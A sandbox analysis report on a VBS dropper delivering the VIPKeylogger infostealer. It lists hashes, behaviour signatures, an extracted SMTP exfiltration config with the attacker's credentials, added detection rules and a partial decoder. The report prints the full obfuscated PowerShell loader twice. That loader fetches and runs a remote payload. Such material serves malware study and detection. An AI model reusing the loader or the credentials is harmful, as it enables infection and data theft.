Analysis

max time kernel: 95s
max time network: 100s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 23-10-2024 14:46

Static task: static1

Behavioral task: behavioral1
  Sample: 69-33-600 Kreiselkammer ER3.vbs
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: 69-33-600 Kreiselkammer ER3.vbs
  Resource: win10v2004-20241007-en
General

Target: 69-33-600 Kreiselkammer ER3.vbs
Size: 530KB
MD5: d281f65b5323332d8061568ce377ea0b
SHA1: 67230ca5abe0f13217a34801be32ff2d573692fa
SHA256: 31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a
SHA512: 6a163cb0202bec65ff0d66df700e93ac6c051469a9c5e4d1e68b2be1e7886f70f69a290e8c2b5e39c1d362d2783942c81561685465149cf6ab75c9d606ee2d16
SSDEEP: 6144:or/7TXNXM0vl4byj8e8j9317d6AMGsP8lLJIRChb6peTUy6TcWFhyuNgtjzfzycT:iSmlcIyYA/sEJQcb0ctuNOLycdeg
Malware Config

Extracted: vipkeylogger
Protocol: smtp
Host: mail.minhlamcons.com
Port: 587
Username: [email protected]
Password: @Tran@123456
Email To: [email protected]
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.

Blocklisted process makes network request  (10 IoCs)
Processes:
  flow  pid   process
  3     644   powershell.exe
  5     644   powershell.exe
  8     2764  msiexec.exe
  10    2764  msiexec.exe
  12    2764  msiexec.exe
  14    2764  msiexec.exe
  15    2764  msiexec.exe
  17    2764  msiexec.exe
  19    2764  msiexec.exe
  21    2764  msiexec.exe

Command and Scripting Interpreter: PowerShell
Processes:
  pid   process
  644   powershell.exe
  2068  powershell.exe
Legitimate hosting services abused for malware hosting/C2  (1 TTPs, 3 IoCs)

Looks up external IP address via web service  (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  16    checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger  (1 IoCs)
Processes:
  pid   process
  2764  msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger  (2 IoCs)
Processes:
  pid   process
  2068  powershell.exe
  2764  msiexec.exe
Enumerates physical storage devices  (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery  (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
Processes:
  description  ioc                                                          process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Suspicious behavior: EnumeratesProcesses  (4 IoCs)
Processes:
  pid   process
  644   powershell.exe
  2068  powershell.exe
  2068  powershell.exe
  2764  msiexec.exe

Suspicious behavior: MapViewOfSection  (1 IoCs)
Processes:
  pid   process
  2068  powershell.exe

Suspicious use of AdjustPrivilegeToken  (3 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  644   powershell.exe
  Token: SeDebugPrivilege  2068  powershell.exe
  Token: SeDebugPrivilege  2764  msiexec.exe

Suspicious use of WriteProcessMemory  (11 IoCs)
Processes:
  description                       pid   process         target process
  PID 2344 wrote to memory of 644   2344  WScript.exe     powershell.exe  (3 IoCs)
  PID 2068 wrote to memory of 2764  2068  powershell.exe  msiexec.exe     (8 IoCs)
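The chain these signatures record (a script host writing into powershell.exe, PowerShell spawning an argument-less msiexec.exe, and that msiexec.exe then talking to checkip.dyndns.org and an SMTP server on port 587) maps directly onto a few hunt rules over process-creation and outbound-connection telemetry. The Python below is an added example, not part of the sandbox report or of the malware. The event records are constructed to mirror this run plus two benign controls; the parent of WScript.exe, the extra hollow-host names beyond msiexec.exe and the IP-lookup hostnames beyond checkip.dyndns.org are assumptions.

```python
"""Hunt rules for the WScript -> PowerShell -> argument-less msiexec chain (added example)."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    kind: str              # "process" (creation) or "network" (outbound connection)
    pid: int
    image: str
    parent_image: str = ""
    cmdline: str = ""
    dst_host: str = ""
    dst_port: int = 0


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# msiexec.exe is the hollowed host in this run; the other names are assumed common alternatives.
HOLLOW_HOSTS = {"msiexec.exe", "regsvr32.exe", "regasm.exe", "installutil.exe"}
MAIL_PORTS = {25, 465, 587}
# checkip.dyndns.org is the service seen in this run; the rest are assumed equivalents.
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "api.ipify.org", "icanhazip.com"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True when anything follows the (possibly quoted) image path on the command line."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.split(None, 1)[1] if " " in s else ""
    return rest.strip() != ""


def evaluate(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for every event that matches one of the hunt rules."""
    alerts = []
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        if e.kind == "process":
            if img == "powershell.exe" and parent in SCRIPT_HOSTS:
                alerts.append(("script_host_spawns_powershell", e.pid))
            # A hollow-host binary started by a script interpreter with no arguments has no installer work to do.
            if img in HOLLOW_HOSTS and parent in SCRIPT_HOSTS | {"powershell.exe"} and not has_arguments(e.cmdline):
                alerts.append(("argless_hollow_host_from_script", e.pid))
        elif e.kind == "network" and img in HOLLOW_HOSTS:
            # msiexec.exe may legitimately fetch packages over HTTP, so only SMTP and IP-lookup destinations are flagged.
            if e.dst_port in MAIL_PORTS:
                alerts.append(("hollow_host_smtp_connection", e.pid))
            elif e.dst_host.lower() in IP_LOOKUP_HOSTS:
                alerts.append(("hollow_host_external_ip_lookup", e.pid))
    return alerts


WSCRIPT = r"C:\Windows\System32\WScript.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSI32 = r"C:\Windows\SysWOW64\msiexec.exe"

EVENTS = [  # constructed telemetry modelled on this run, followed by two benign controls
    Event("process", 2344, WSCRIPT, parent_image=r"C:\Windows\explorer.exe",
          cmdline=r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\69-33-600 Kreiselkammer ER3.vbs"'),
    Event("process", 644, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", parent_image=WSCRIPT,
          cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne #>;$Stjlendes=\'Sellouts\';"'),
    Event("process", 2764, MSI32, parent_image=PS32, cmdline=r'"C:\Windows\SysWOW64\msiexec.exe"'),
    Event("network", 2764, MSI32, dst_host="checkip.dyndns.org", dst_port=80),
    Event("network", 2764, MSI32, dst_host="mail.minhlamcons.com", dst_port=587),
    Event("process", 3100, r"C:\Windows\System32\msiexec.exe", parent_image=r"C:\Windows\System32\services.exe",
          cmdline=r'"C:\Windows\System32\msiexec.exe" /V'),
    Event("network", 4200, r"C:\Program Files\MailClient\mail.exe", dst_host="smtp.example.invalid", dst_port=587),
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule}: pid {pid}")
```

The argument check is what separates the hollowed copy from the real installer service: the legitimate msiexec.exe that services.exe starts carries /V, while the one PowerShell launched here has nothing after its image path.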
Processes

C:\Windows\System32\WScript.exe   (level 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\69-33-600 Kreiselkammer ER3.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 2344
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. 
kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. 
');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot 
loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft 
');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 644
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. 
kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. 
');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot 
loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft 
');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"1⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2068

C:\Windows\SysWOW64\msiexec.exe   (level 2, child of PID 2068; launched with no arguments)
  Command line: "C:\Windows\SysWOW64\msiexec.exe"
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2764
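Both powershell.exe command lines above hide every string behind one helper. Forhandlingsresultat walks its argument from index 5 in steps of 6 and keeps only those characters; it stops one short of the end because $Aendrings is incremented to 1 whenever $host.UI exists, so the final filler character of every literal is skipped. Restrainedness then runs the decoded text through $Conacaste, which itself decodes to iex, so each Restrainedness call is an invoke-expression of a decoded fragment. The Python below is an added example (not the sample's code and not part of the report) that re-implements the scheme, reads the start offset and stride from the loader's own for-loop rather than hardcoding them, and pulls every literal out of the command line. SAMPLE is a constructed excerpt holding the decoder body and three literals copied verbatim from the command line above; obfuscate() is a hypothetical inverse used only for a round-trip check.

```python
"""Re-implementation of the loader's every-sixth-character string decoder (added example)."""
import re

# The loader reveals its own parameters in the decoder's for-loop:
#   for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6)
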